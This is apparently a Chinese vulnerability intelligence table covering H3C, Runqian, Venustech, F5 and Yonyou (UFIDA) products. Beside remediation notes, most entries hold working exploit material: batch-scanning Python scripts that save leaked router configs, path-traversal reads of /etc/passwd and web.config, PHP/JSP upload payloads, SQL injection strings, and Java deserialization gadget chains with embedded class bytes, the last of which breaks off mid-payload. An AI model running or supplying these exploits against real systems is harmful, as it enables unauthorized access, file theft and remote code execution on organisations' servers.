情报获取时间 |
0day/1day/nday |
| 信息泄露 |
H3C ER8300G2-X |
/userLogin.asp/../actionpolicy_status/../ER8300G2-x.cfg |
WAF封禁路路径,等待发布补丁 |
726 |
1day |
漏洞详情
import requests
import urllib3
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
payload = '/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg'
invalidkey = "home.asp"
with open('target.txt', 'r') as f:
for target in f:
url = target + payload
try:
req = requests.get(url, verify=False)
except:
pass
if req.status_code == 200:
if invalidkey not in req.text:
parsed = urlparse(url)
with open(str(parsed.hostname) + '.' + str(parsed.port) + '.txt', 'w') as w:
w.write(req.text)
w.close()
print('[+] Target: ' + target + ' is Vulnerability')
H3C集团官网某处任意用户登录漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
未知 |
WAF封禁路路径,等待发布补丁 |
726 |
0day |
漏洞详情
未知
H3C_iMC_智能管理中心_byod_index_xhtml命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/byod/index.xhtml |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /byod/index.xhtml HTTP/1.1
javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2b4sy0rUOuO
dM5ccd2J6LPx8c6%2b53QkrX...jpFKgVnp07bad4n6CCBW8l98QIKwByAhLYdU2VpB/voaa....2
oU%2burahQDFE8mIaFvmwyKOHiwyovIHCVymqKwNdWXm3iHLhYEQXL4....k3z7MWm%2
bwbV2Dc9TXV4rs8E6M7ZvVM3B0pORK8vAhd2iLBkgFhGHw9ZgOwifGnyMzfxlU....gG4chE
Og57teuLurMPrulbEVBAEl7rRwobqvxb91sG%2bGMrGWFL5%2bwFvE56x7UEzHtE/o0IRtzTKi
/EFnamrPT1046e7L8jABKDB/LjCX2qAOmqQkIz4gXrEFnHHYZ9LZc7t9ZZPNT...JZjummuZuro
r/zwPbnsApwXlYsn2hDAZ7QlOBunA3t7omeOTI5keWXvmOH8eoEEN//SlmQblwhBZ7kSHPvSt
q0ZciiPptEzVjQ/k/gU2QbCSc7yG0MFbhcJEDQj4yKyJ/yTnOOma....KuNzZl%2bPpEua%2b28h2
YCKipVb5S/wOCrg%2bKD3DUFCbdWHQRqDaZyvYsc8C0X7fzutiVUlSB7OdGoCjub9WuW0d
2eeDWZmOt3Wunms3SwAbE7R%2bonCRVS8tiYWF8qiQS%2bl0k8Gw/Hz6Njpfe0upLIAtPFND
uSf69qGg4isEmY2FtoSQTdD8vU0BdJatHrBArPgo9Qsp0jSJBlUz2OqteQg05PYO6gEBXVj/RiTB
HI1/pOzlcE0wVZcLUHnxGNvckSCTiT....nWbkWGJ8AYCvrM0PHZ/BYcKKRf3rMHoIqcAN%2
bORMhXcmAXRcvq29c5xqoOuvrMSJPDZmbZhcm/99crGJSO5HxXQder9WKm2tVBaDLEC9ul
pWyICJYgfxayoWkt6vwPcq2Tn20vn5RDpfqJKLNLbrV8g7JDRUUyW%2b....R6PRNunKhfJHvH
cXAZ73mkCUf7cMUbNhqCbLSGP/D%2bqpqWXk5ZWjsT4tQ9tFH9uvPIaNB7FlcFXI2I2A9oPo
Y0ltif%2bb8BdPXVfpuZq8boHE4hY%2b33BIl%2bIa%2bov6nyMmGIzCKYeRbfDJtk/45EXvink
6BIgA/205la6vvqKTGQ32o1AtepBgKei....604cVvbEP7UKor09Gz61mryE4D%2biXG1prZGCT3L
EtdASuCkmf4RTEc5wks2In3ElZSZl8zf3RsHA0dgbvrpnXe2wLPI%2bUCAGO%2biOG9/%2bbC
QJQNFmykkyRbmslfcilUxZ%2bIg%2bQuOs9FlMod2ICrkktOFFeZWNeznx737S8H4Nf2%2bp2Q
NHY2I6GFGtWpqjeZ%2bGmb1euM5Tzi06eJ.......koPrjkDT9VPoxCgpRMQl06x7NShkos7BCI9f
V1%2b17t5gWZvqAYzeQUsZLaiBXaZfuUtPuBmbq1re/dB/VgSOn4QX%2b8AwwDjtfazsHw4aId
h4e2a1y/Ou2ZiI//EzkwIBksY6CluuPgocdvtOfNiWcXsfYs3UKLmL/48A4Ls0OF1TrQK4UnfCYt...
..1DGrwzfXnM9vLHznFaJenqvLY3yTiKN5SSVxvGwvhmp6PFW4Jj7G8NXdr/zN7HyC9Eg1Y1j
KP7uiO%2bGM2U/etvMOCKwnfP2MnbznP378fZHf1H9yiVVrn%2bm%2b0u8PV.....2MsOTgS6
B7C8ItflgSfJz5dkJ8IssRAcY%2bu/2QjrW95BBMSRPu2EaCUm1IpuszXEwHYgDizWPzDB0hSR
gCEjncpGhPX3i10bK4/snBaBcAxAa1e2er2LDe/4WgaIwc9w2wKn3wXY5B87BKF5/Xq30....NNf
6EMRrQ9154rEkCJb4IU4sFsTuyYlfZatlV%2bC2HM7u7FEbdVvr6yYK4oQqvfPmF5yRplwAYU
QAvr1jwLbGYxhGaTy14UUrtvoyph5Sqebk2YTKjKX4U7xX5ha4YbyoVIMSRzdvB6YXDY3BId
%2bgmMWZtTf2UE%2b9UAx/7g30pQNXA....FP1adq6ySd4x3dGVCe4YJcYe2gKWYVcWj5XP
wUSt2fxdshzgFnjjqmRgxowH2u2nZU0xG539lnxIOlB
H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/webui/?g=local_cert_delete_both |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
POST /webui/?g=local_cert_delete_both HTTP/1.1
--ed63f728755e4a2f90d094ec09b0ed9a
local_cert_import
--ed63f728755e4a2f90d094ec09b0ed9a
<?php echo md5('OmwiBdiyupqeAlMJ');@unlink(__file__);?>
--ed63f728755e4a2f90d094ec09b0ed9a--
H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/imc/dc3dtopo/dc2dtopo/autoDeploy.xhtml;.png |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /imc/dc3dtopo/dc2dtopo/autoDeploy.xhtml;.png HTTP/1.1
javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2b4sy0rUOuOdM5ccd2J6LPx8c6%2b53QkrX...jpFKgVnp07bad4n6CCBW8l98QIKwByAhLYdU2VpB/voaa....2oU%2burahQDFE8mIaFvmwyKOHiwyovIHCVymqKwNdWXm3iHLhYEQXL4....k3z7MWm%2bwbV2Dc9TXV4rs8E6M7ZvVM3B0pORK8vAhd2iLBkgFhGHw9ZgOwifGnyMzfxlU....gG4chEOg57teuLurMPrulbEVBAEl7rRwobqvxb91sG%2bGMrGWFL5%2bwFvE56x7UEzHtE/o0IRtzTKi/EFnamrPT1046e7L8jABKDB/LjCX2qAOmqQkIz4gXrEFnHHYZ9LZc7t9ZZPNT...JZjummuZuror/zwPbnsApwXlYsn2hDAZ7QlOBunA3t7omeOTI5keWXvmOH8eoEEN//SlmQblwhBZ7kSHPvStq0ZciiPptEzVjQ/k/gU2QbCSc7yG0MFbhcJEDQj4yKyJ/yTnOOma....KuNzZl%2bPpEua%2b28h2YCKipVb5S/wOCrg%2bKD3DUFCbdWHQRqDaZyvYsc8C0X7fzutiVUlSB7OdGoCjub9WuW0d2eeDWZmOt3Wunms3SwAbE7R%2bonCRVS8tiYWF8qiQS%2bl0k8Gw/Hz6Njpfe0upLIAtPFNDuSf69qGg4isEmY2FtoSQTdD8vU0BdJatHrBArPgo9Qsp0jSJBlUz2OqteQg05PYO6gEBXVj/RiTBHI1/pOzlcE0wVZcLUHnxGNvckSCTiT....nWbkWGJ8AYCvrM0PHZ/BYcKKRf3rMHoIqcAN%2bORMhXcmAXRcvq29c5xqoOuvrMSJPDZmbZhcm/99crGJSO5HxXQder9WKm2tVBaDLEC9ulpWyICJYgfxayoWkt6vwPcq2Tn20vn5RDpfqJKLNLbrV8g7JDRUUyW%2b....R6PRNunKhfJHvHcXAZ73mkCUf7cMUbNhqCbLSGP/D%2bqpqWXk5ZWjsT4tQ9tFH9uvPIaNB7FlcFXI2I2A9oPoY0ltif%2bb8BdPXVfpuZq8boHE4hY%2b33BIl%2bIa%2bov6nyMmGIzCKYeRbfDJtk/45EXvink6BIgA/205la6vvqKTGQ32o1AtepBgKei....604cVvbEP7UKor09Gz61mryE4D%2biXG1prZGCT3LEtdASuCkmf4RTEc5wks2In3ElZSZl8zf3RsHA0dgbvrpnXe2wLPI%2bUCAGO%2biOG9/%2bbCQJQNFmykkyRbmslfcilUxZ%2bIg%2bQuOs9FlMod2ICrkktOFFeZWNeznx737S8H4Nf2%2bp2QNHY2I6GFGtWpqjeZ%2bGmb1euM5Tzi06eJ.......koPrjkDT9VPoxCgpRMQl06x7NShkos7BCI9fV1%2b17t5gWZvqAYzeQUsZLaiBXaZfuUtPuBmbq1re/dB/VgSOn4QX%2b8AwwDjtfazsHw4aIdh4e2a1y/Ou2ZiI//EzkwIBksY6CluuPgocdvtOfNiWcXsfYs3UKLmL/48A4Ls0OF1TrQK4UnfCYt.....1DGrwzfXnM9vLHznFaJenqvLY3yTiKN5SSVxvGwvhmp6PFW4Jj7G8NXdr/zN7HyC9Eg1Y1jKP7uiO%2bGM2U/etvMOCKwnfP2MnbznP378fZHf1H9yiVVrn%2bm%2b0u8PV.....2MsOTgS6B7C8ItflgSfJz5dkJ8IssRAcY%2bu/2QjrW95BBMSRPu2EaCUm1IpuszXEwHYgDizWPzDB0hSRgCEjncpGhPX3i10bK4/snBaBcAxAa1e2er2LDe/4WgaIwc9w2wKn3wXY5B87BKF5/Xq30....NNf6EMRrQ9154rEkCJb4IU4sFsTuyYlfZatlV%2bC2HM7u7FEbdVvr6yYK4oQqvfPmF5yRplwAYUQAvr1jwLbGYxhGaTy14UUrtvoyph5Sqebk2YTKjKX4U7xX5ha4YbyoVIMSRzdvB6YXDY3BId%2bgmMWZtTf2UE%2b9UAx/7g30pQNXA....FP1adq6ySd4x3dGVCe4YJcYe2gKWYVcWj5XPwUSt2fxdshzgFnjjqmRgxowH2u2nZU0xG539lnxIOlB
H3C-iMC智能管理中心存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/selfservice/login.jsf |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /selfservice/login.jsf HTTP/1.1
javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2b4sy0rUOuOdM5ccd2J6LPx8c6%2b53QkrX...jpFKgVnp07bad4n6CCBW8l98QIKwByAhLYdU2VpB/voaa....2oU%2burahQDFE8mIaFvmwyKOHiwyovIHCVymqKwNdWXm3iHLhYEQXL4....k3z7MWm%2bwbV2Dc9TXV4rs8E6M7ZvVM3B0pORK8vAhd2iLBkgFhGHw9ZgOwifGnyMzfxlU....gG4chEOg57teuLurMPrulbEVBAEl7rRwobqvxb91sG%2bGMrGWFL5%2bwFvE56x7UEzHtE/o0IRtzTKi/EFnamrPT1046e7L8jABKDB/LjCX2qAOmqQkIz4gXrEFnHHYZ9LZc7t9ZZPNT...JZjummuZuror/zwPbnsApwXlYsn2hDAZ7QlOBunA3t7omeOTI5keWXvmOH8eoEEN//SlmQblwhBZ7kSHPvStq0ZciiPptEzVjQ/k/gU2QbCSc7yG0MFbhcJEDQj4yKyJ/yTnOOma....KuNzZl%2bPpEua%2b28h2YCKipVb5S/wOCrg%2bKD3DUFCbdWHQRqDaZyvYsc8C0X7fzutiVUlSB7OdGoCjub9WuW0d2eeDWZmOt3Wunms3SwAbE7R%2bonCRVS8tiYWF8qiQS%2bl0k8Gw/Hz6Njpfe0upLIAtPFNDuSf69qGg4isEmY2FtoSQTdD8vU0BdJatHrBArPgo9Qsp0jSJBlUz2OqteQg05PYO6gEBXVj/RiTBHI1/pOzlcE0wVZcLUHnxGNvckSCTiT....nWbkWGJ8AYCvrM0PHZ/BYcKKRf3rMHoIqcAN%2bORMhXcmAXRcvq29c5xqoOuvrMSJPDZmbZhcm/99crGJSO5HxXQder9WKm2tVBaDLEC9ulpWyICJYgfxayoWkt6vwPcq2Tn20vn5RDpfqJKLNLbrV8g7JDRUUyW%2b....R6PRNunKhfJHvHcXAZ73mkCUf7cMUbNhqCbLSGP/D%2bqpqWXk5ZWjsT4tQ9tFH9uvPIaNB7FlcFXI2I2A9oPoY0ltif%2bb8BdPXVfpuZq8boHE4hY%2b33BIl%2bIa%2bov6nyMmGIzCKYeRbfDJtk/45EXvink6BIgA/205la6vvqKTGQ32o1AtepBgKei....604cVvbEP7UKor09Gz61mryE4D%2biXG1prZGCT3LEtdASuCkmf4RTEc5wks2In3ElZSZl8zf3RsHA0dgbvrpnXe2wLPI%2bUCAGO%2biOG9/%2bbCQJQNFmykkyRbmslfcilUxZ%2bIg%2bQuOs9FlMod2ICrkktOFFeZWNeznx737S8H4Nf2%2bp2QNHY2I6GFGtWpqjeZ%2bGmb1euM5Tzi06eJ.......koPrjkDT9VPoxCgpRMQl06x7NShkos7BCI9fV1%2b17t5gWZvqAYzeQUsZLaiBXaZfuUtPuBmbq1re/dB/VgSOn4QX%2b8AwwDjtfazsHw4aIdh4e2a1y/Ou2ZiI//EzkwIBksY6CluuPgocdvtOfNiWcXsfYs3UKLmL/48A4Ls0OF1TrQK4UnfCYt.....1DGrwzfXnM9vLHznFaJenqvLY3yTiKN5SSVxvGwvhmp6PFW4Jj7G8NXdr/zN7HyC9Eg1Y1jKP7uiO%2bGM2U/etvMOCKwnfP2MnbznP378fZHf1H9yiVVrn%2bm%2b0u8PV.....2MsOTgS6B7C8ItflgSfJz5dkJ8IssRAcY%2bu/2QjrW95BBMSRPu2EaCUm1IpuszXEwHYgDizWPzDB0hSRgCEjncpGhPX3i10bK4/snBaBcAxAa1e2er2LDe/4WgaIwc9w2wKn3wXY5B87BKF5/Xq30....NNf6EMRrQ9154rEkCJb4IU4sFsTuyYlfZatlV%2bC2HM7u7FEbdVvr6yYK4oQqvfPmF5yRplwAYUQAvr1jwLbGYxhGaTy14UUrtvoyph5Sqebk2YTKjKX4U7xX5ha4YbyoVIMSRzdvB6YXDY3BId%2bgmMWZtTf2UE%2b9UAx/7g30pQNXA....FP1adq6ySd4x3dGVCe4YJcYe2gKWYVcWj5XPwUSt2fxdshzgFnjjqmRgxowH2u2nZU0xG539lnxIOlB
润乾
润乾报表前台任意文件上传漏洞(3个)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<= 20221210 |
/demo/servlet/dataSphereServlet |
|
|
|
| /InputServlet |
等着 |
722 |
nday |
|
|
漏洞详情
POST /InputServlet?action=12 HTTP/1.1
----------------------------170005680039721412137562
1024
----------------------------170005680039721412137562
11111
----------------------------170005680039721412137562--
POST /InputServlet?action=13 HTTP/1.1
file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config
POST /demo/servlet/dataSphereServlet?action=38 HTTP/1.1
------WebKitFormBoundaryAT7qVwFychEm0Dt7
<% out.println("123"); %>
------WebKitFormBoundaryAT7qVwFychEm0Dt7
Content-Disposition: form-data; name="path"
../../../
------WebKitFormBoundaryAT7qVwFychEm0Dt7
Content-Disposition: form-data; name="saveServer"
1
------WebKitFormBoundaryAT7qVwFychEm0Dt7--
启明星辰
天玥网络安全审计系统 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ops/index.php |
使用WAF进行拦截 |
722 |
nday |
漏洞详情
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
天清汉马vpn任意文件读取
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
|
|
|
|
|
| 未知 | /vpn/user/download/client?ostype=../../../../../../../etc/passwd | WAF封禁路径,等待发布补丁 | 724 | nday |
漏洞详情
/vpn/user/download/client?ostype=../../../../../../../etc/passwd
F5
F5 BIG-IP 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/tmui/login.jsp |
|
|
|
| /mgmt/tm/util/bash |
使用WAF进行拦截 |
722 |
nday |
|
|
漏洞详情
https://github.com/adysec/nuclei_poc/blob/ce5a47e163f5440c84dbfc0adb073ab35f562154/poc/cve/CVE-2023-46747.yaml
用友
用友 U8 cloud MonitorServlet 反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet |
使用WAF进行拦截 |
722 |
nday |
漏洞详情
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
恶意序列化数据
用友NC querygoodsgridbycode存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ecp/productonsale/querygoodsgridbycode.json?code= |
WAF封禁路径,等待发布补丁 |
723 |
nday |
漏洞详情
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
用友U8 CRM import.php文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/crmtools/tools/import.php |
等着 |
724 |
0day |
漏洞详情
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
------WebKitFormBoundarye0z8QbHs79gL8vW5
<?php phpinfo();?>
------WebKitFormBoundarye0z8QbHs79gL8vW5
help.php
------WebKitFormBoundarye0z8QbHs79gL8vW5--
用友U8Cloud ActionServlet SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 |
等着 |
724 |
0day |
漏洞详情
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1
用友NC-Cloud blobRefClassSearch接口存在FastJson反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/ncchr/pm/ref/indiIssued/blobRefClassSearch |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"}
用友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
V9.0 |
/kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27– |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
/kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--
用友U9-UMWebService.asmx存在文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/u9/OnLine/UMWebService.asmx |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /u9/OnLine/UMWebService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLogContent xmlns="http://tempuri.org/">
<fileName>../web.config</fileName>
</GetLogContent>
</soap:Body>
</soap:Envelope>
用友u8-cloud RegisterServlet SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/servlet/RegisterServlet |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
def verify(ip):
url = f'{ip}/servlet/RegisterServlet'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36',
'Connection': 'close',
'Content-Length': '85',
'Accept': '*/*',
'Accept-Language': 'en',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip',
}
payload = '''usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--'''
try:
response = requests.post(url, headers=headers, data=payload,verify=False)
if response.status_code == 200 :
print(f"{ip}存在用友u8-cloud RegisterServlet SQL注入漏洞!!!")
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
用友 NC Cloud jsinvoke 任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/uapjs/jsinvoke/?action=invoke |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
def verify(ip):
url = f'{ip}/uapjs/jsinvoke/?action=invoke'
headers = {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
}
payload = '''
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["123456","webapps/nc_web/2YIOmzdcUDhwMYTLk65p3cgxvxy.jsp"]}
'''
try:
response = requests.post(url, headers=headers, data=payload)
if response.status_code == 200 :
print(f"{ip}存在用友 NC Cloud jsinvoke 任意文件上传漏洞!!!")
else:
print('漏洞不存在。')
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
用友NC任意文件读取
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/portal/pt/xml/file/download |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
import concurrent.futures
def check_vulnerability(target):
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
}
try:
res = requests.get(fr"http://{target}/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp", headers=headers, data=r"decorator=%2FWEB-INF%2Fweb.xml&confirm=true", timeout=5)
if "window.location" in res.text :
print(f"[+]{target}漏洞存在")
with open("attack.txt",'a') as fw:
fw.write(f"{target}\n")
else:
print(f"[-]{target}漏洞不存在")
except Exception as e:
print(f"[-]{target}访问错误")
if __name__ == "__main__":
print("target.txt存放目标文件")
print("attack.txt存放检测结果")
print("------------------------")
print("按回车继续")
import os
os.system("pause")
f = open("target.txt", 'r')
targets = f.read().splitlines()
print(targets)
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
executor.map(check_vulnerability, targets)
用友U8cloud-MeasureQueryFrameAction存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp |
/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:3%27--+
用友-畅捷通CRM-任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/ajax/uploadfile.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
用友-CRM客户关系管理系统-任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/crmtools/tools/import.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
------WebKitFormBoundarye0z8QbHs79gL8vW5
<?php phpinfo();?>
------WebKitFormBoundarye0z8QbHs79gL8vW5
help.php
------WebKitFormBoundarye0z8QbHs79gL8vW5--
用友NC-UserAuthenticationServlet存在反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x07sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x16getDeclaredConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00\x02A4ur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x1b\xbb\xca\xfe\xba\xbe\x00\x00\x001\x01\x9a\x0a\x00\x1e\x00\xad\x0a\x00C\x00\xae\x0a\x00C\x00\xaf\x0a\x00\x1e\x00\xb0\x08\x00\xb1\x0a\x00\x1c\x00\xb2\x0a\x00\xb3\x00\xb4\x0a\x00\xb3\x00\xb5\x07\x00\xb6\x0a\x00C\x00\xb7\x08\x00\xa5\x0a\x00!\x00\xb8\x08\x00\xb9\x08\x00\xba\x07\x00\xbb\x08\x00\xbc\x08\x00\xbd\x07\x00\xbe\x0a\x00\x1c\x00\xbf\x08\x00\xc0\x08\x00\xc1\x07\x00\xc2\x0b\x00\x16\x00\xc3\x0b\x00\xc4\x00\xc5\x0b\x00\xc4\x00\xc6\x08\x00\xc7\x08\x00\xc8\x07\x00\xc9\x0a\x00\x1c\x00\xca\x07\x00\xcb\x0a\x00\xcc\x00\xcd\x08\x00\xce\x07\x00\xcf\x08\x00\xd0\x0a\x00\x8f\x00\xd1\x0a\x00!\x00\xd2\x08\x00\xd3\x09\x00\xd4\x00\xd5\x0a\x00\xd4\x00\xd6\x08\x00\xd7\x0a\x00\x8f\x00\xd8\x0a\x00\x1c\x00\xd9\x08\x00\